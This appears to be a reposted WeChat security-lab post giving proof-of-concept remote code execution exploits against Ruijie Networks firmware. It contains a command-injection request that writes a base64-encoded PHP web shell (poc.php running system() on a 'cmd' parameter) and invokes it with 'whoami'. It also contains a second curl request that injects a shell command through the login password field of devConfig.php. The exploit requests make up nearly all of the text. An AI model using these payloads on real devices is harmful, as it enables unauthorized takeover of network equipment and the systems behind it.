echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d POC: POST /guest_auth/guestIsUp.php ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 GET /guest_auth/poc.php?cmd=whoami
Another unauthorized RCE in same firmware PoC: curl http://host/openApi/devConfig.php?a=login -X POST -d "{"admin":"admin","encry":true,"password":"1'; COMMAND ;echo 'a"}"
本文始发于微信公众号(Khan安全攻防实验室):Ruijie Networks RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论